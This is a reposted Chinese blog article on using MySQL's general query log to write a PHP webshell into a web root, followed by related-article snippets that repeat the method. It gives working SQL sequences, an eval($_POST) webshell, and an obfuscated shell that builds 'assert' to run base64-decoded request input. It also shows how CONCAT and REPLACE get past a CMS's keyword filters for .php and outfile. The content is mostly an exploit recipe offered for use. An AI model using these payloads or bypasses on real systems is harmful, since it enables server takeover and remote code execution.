mysql 开启日志 写shell_【安全科普】SQL语句利用日志写shell及相关绕过

最新推荐文章于 2024-03-20 08:01:11 发布
最新推荐文章于 2024-03-20 08:01:11 发布
阅读量587 收藏
点赞数
文章标签: mysql 开启日志 写shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29001327/article/details/113439910
版权
本文介绍了如何在MySQL中利用SQL语句开启日志并写入shell,以及针对过滤.php和相关函数的绕过方法,包括使用CONCAT和REPLACE函数进行字符串操作来规避检测。
摘要由CSDN通过智能技术生成

原标题:【安全科普】SQL语句利用日志写shell及相关绕过

● 0x01 基本原理●

在能够写SQL语句的地方,outfile、dumpfile、drop database等都被禁止,一般进行SQL注入来getshell或删库的方式行不通了。

但是如果MySQL是root用户启动的,那么可以进行如下利用:

1showvariableslike'%general%'; #查看配置

2

3setglobalgeneral_log = on; #开启general log模式

4

5setglobalgeneral_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址

6

7select'<?php eval($_POST[cmd]);?>'#写入shell

SQL查询免杀shell的语句(参考:SQL语句利用日志写shell):

1SELECT " <?php $p = array( 'f'=> 'a', 'pffff'=> 's', 'e'=> 'fffff', 'lfaaaa'=> 'r', 'nnnnn'=> 't');$a = array_keys($p);$_=$p[ 'pffff'].$p[ 'pffff'].$a[ 2];$_= 'a'.$_. 'rt';$_(base64_decode($_REQUEST[ 'username'])); ?>"

● 0x02 Bypass案例●

这个案例虽然鸡肋,但是思路还可以。

>>>>

过滤 .php

代码审计某CMS时,看到一处写SQL语句的地方,此处之前报过漏洞,修复方案是过滤了outfile、dumpfile、drop database等,此外还过滤了.php字符串,为的就是防住SQL语句日志写shell:

1if(stristr( $sql, 'outfile')){

2$str= 'ERROR : 检测到非法字符 “outfile”!';

3break;

4}

5if(stristr( $sql, 'dumpfile')){

6$str= 'ERROR : 检测到非法字符 “dumpfile”!';

7break;

8}

9if(stristr( $sql, '.php')){

10$str= 'ERROR : 检测到非法字符 “.php” !';

11break;

12}

13if(preg_match( "/^drop(.*)database/i", $sql)){

14$str= 'ERROR : 不允许删除数据库!';

15break;

16}

这里直接写上述的SQL语句肯定是不行的,因为set global general_log_file = '/var/www/html/1.php';的.php会被过滤掉。

这里只是针对字符串的检测,可以用字符串拼接的方式Bypass,这里可以使用SQL语句中的concat家族系列函数来实现字符串拼接来Bypass:

1showvariableslike'%general%'; #查看配置

2

3setglobalgeneral_log = on; #开启general log模式

4

5setglobalgeneral_log_file = CONCAT( "/var/www/html/1.", "php");

6

7select'<?php eval($_POST[cmd]);?>'; #写入shell

>>>>

过滤 .php和concat

在这次报过的漏洞之后,CMS厂商修改了这个洞,就是添加了对concat的字符串过滤,这样concat家族系列函数就使不上了。

1if(stristr( $sql, 'outfile')){

2$str= 'ERROR : 检测到非法字符 “outfile”!';

3break;

4}

5if(stristr( $sql, 'dumpfile')){

6$str= 'ERROR : 检测到非法字符 “dumpfile”!';

7break;

8}

9if(stristr( $sql, '.php')){

10$str= 'ERROR : 检测到非法字符 “.php” !';

11break;

12}

13if(stristr( $sql, 'concat')){

14$str= 'ERROR : 检测到非法字符 “concat” !';

15break;

16}

17if(preg_match( "/^drop(.*)database/i", $sql)){

18$str= 'ERROR : 不允许删除数据库!';

19break;

20}

使用concat进行字符串拼接的方式没法绕过了,但是除了字符串拼接,我们还能使用字符串替换的操作来绕过:

1showvariableslike'%general%'; #查看配置

2

3setglobalgeneral_log = on; #开启general log模式

4

5setglobalgeneral_log_file = REPLACE( "/var/www/html/1.jpg", "jpg", "php");

6

7select'<?php eval($_POST[cmd]);?>'; #写入shell

>>>>

过滤 .php、concat和replace

CMS厂商收到新的绕过漏洞报告后,又进行新一轮的修复,过滤了replace:

1if(stristr( $sql, 'outfile')){

2$str= 'ERROR : 检测到非法字符 “outfile”!';

3break;

4}

5if(stristr( $sql, 'dumpfile')){

6$str= 'ERROR : 检测到非法字符 “dumpfile”!';

7break;

8}

9if(stristr( $sql, '.php')){

10$str= 'ERROR : 检测到非法字符 “.php” !';

11break;

12}

13if(stristr( $sql, 'concat')){

14$str= 'ERROR : 检测到非法字符 “concat” !';

15break;

16}

17if(stripos( $sql, 'replace')){

18$str= 'ERROR : 检测到非法字符 “replace” !';

19break;

20}

21if(preg_match( "/^drop(.*)database/i", $sql)){

22$str= 'ERROR : 不允许删除数据库!';

23break;

24}

字符串拼接和替换都不能成功进行利用了,还有啥办法不?

当然还有新的Bypass方法哈哈。

文:Mi1k7ea

原文链接:https://www.mi1k7ea.com

如有侵权请联系删除

责任编辑:

于欣烈
关注
SQL注入学习资料总结
墨痕诉清风的博客
05-13 728
结构化查询语言(Structured Query Language,缩:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的。
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
热门推荐
杨秀璋的专栏
09-15 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。本篇文章,作者将分享两篇论文,机器学习是如何运用到恶意代码攻击中的,并谈谈自己的理解,后续深入研究尝试分享相关实验,目前还是小白一只。基础性文章,希望对初学者有帮助,大神请飘过,谢谢各位看官!
mysql log shell_利用mysql general log shell 可行性简要分析
weixin_39867594的博客
02-05 808
0×01 前言实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfileshell的时候,却怎么都不进去,前提可以肯定的是,我们对目标的网站目录绝对是有权限的且mysql的root用户本身并没有被降权,一般出现这样的情况很可能就是因为into outfile被禁用或waf拦截,希望下面的方式能帮到你0×02 拿shell利用mys...
Mysql 后台日志shell(root权限)
haoge1998的博客
04-15 1852
Mysql shell 一、后台日志shell 前提: 需要有root权限 outfile被禁止 文件入被拦截 1、查看配置 是否开启日志 日志入路径 show variables like '%general%'; 2、开启general log模式为on set global general_log = on; 3、设置目录为shell地址 set global general_log_file = '/var/www/html'; 4、shell select '<?
SQL语句利用日志shell
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-24 322
SQL语句利用日志shell outfile被禁止,或者入文件被拦截 在数据库中操作如下:(必须是root权限) 1.show variables like ‘%general%'; #查看配置 2.set global general_log = on; #开启general log模式 3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为shell地址 4.select ‘<?php eval($_POST[cmd]);
mysql 日志shell脚本_编Shell脚本的最佳实践
weixin_28993425的博客
02-03 367
Shell脚本的最佳实践http://kb.cnblogs.com/page/574767/需要记住的代码有注释#!/bin/bash# Written by steven# Name: mysqldump.sh# Version: v1.0# Parameters : 无# Function: mysqldump备份mysql# Create Date:2...
mysql将冒号分隔的串分成多条记录_分割mysql字符
weixin_39610721的博客
02-02 393
shell编程检测监控mysql的CPU占用率shell编程很强大!网站访问量大的时候mysql的压力就比较大,当mysql的CPU利用率超过300%的时候就不能提供服务了,近乎卡死状态,这时候最好的方法就是重启mysql服务。由于这种事具有不可预见性,我们不知道什么时候mysql的占用率达到300%,还是个程序定期判断比...文章吞吞吐吐的2017-10-181009浏览量mysql 安装se...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 987
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Oracle学习总结(6)—— SQL注入技术
科技D人生
09-23 2994
不管用什么语言编的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行
mysql 日志 shell_phpmyadmin通过日志shell
weixin_30499557的博客
02-18 88
环境:win2003 、IIS6、PHP、asp、cgi-fcgi1、set global general_log='on'2、set global general_log_file='c:\\phpstudy\\www\\log.php' #一定使用 '\\'3、select ""出现时不时错误:HTTP/1.1 500 Server ErrorDate: Tue, 23 Jan 2018 ...
SQL语句利用日志shell(转载)
来到了学渣的博客
01-01 1253
outfile被禁止,或者入文件被拦截 在数据库中操作如下:(必须是root权限) 1.show variables like ‘%general%’; #查看配置 2.set global general_log = on; #开启general log模式 3.set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell...
mysql_mysql多语句shell
weixin_30312037的博客
02-01 94
mysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D2...
shell入文件_SQL语句利用日志shell
weixin_39774219的博客
12-18 333
outfile被禁止,或者入文件被拦截;在数据库中操作如下:(必须是root权限)show variables like '%general%'; #查看配置set global general_log = on; #开启general log模式set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell...
mysql 开启日志 shell_Phpmyadmin日志getshell
weixin_39531378的博客
01-19 600
这个算是一个很常见也很基础的getshell的方式,昨天有个小伙伴问到我这个问题,说面试的时候主管给了他一个phpmyadmin登录入口,让他getshell,由于实战经验较少,小伙伴那道题没拿到分。其实,看到phpmyadmin,第一反应就应该是日志getshell。为了防止大家继续踩坑,特地科普一波。大家看了以后记得在本地phpstudy环境内动手测试一下,以免后面再遇到这类面试题不知道怎么...
Mysqlshell的几种方式
Redredredfish的博客
08-23 7918
Mysqlshell的几种方式 当我们拿到数据库权限时,可通过数据库管理工具入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfileshell 尝试通过outfile入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
MySQLshell的问题
最新发布
m0_62207482的博客
03-20 669
disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_ope n,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source`,但是可 以用dl扩展执行命令或者ImageMagick漏洞。secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。
mysqlshell_基于mysql下的几种shell方法
weixin_35212670的博客
01-18 2940
0x00关于mysql下的shell方法网上基本很多了,我原本也没打算总结总结的,毕竟网上已经很多了,不过在看 kilon 大佬的博客的时候,给我的感受就是明明一个几句话的东西,总能详细的,有条有理的记录下来,所以也正是如此,才有了这篇文章。0x01利用条件数据库当前用户为root权限知道当前网站的绝对路径PHP的GPC为 off状态入的那个路径存在入权限0x02基于联合查询法下的两个入方...
mysql日志浅析
weixin_33843947的博客
04-12 83
mysql日志浅析 mysql 日志种类一般分为错误日志,二进制日志,一般查询日志,慢查询日志,和中继日志。通常要开启日志是错误日志和二进制日志,二进制日志尤为重要。下面介绍这几种日志。 一,错误日志, 顾名思义,就是记录系统错误信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值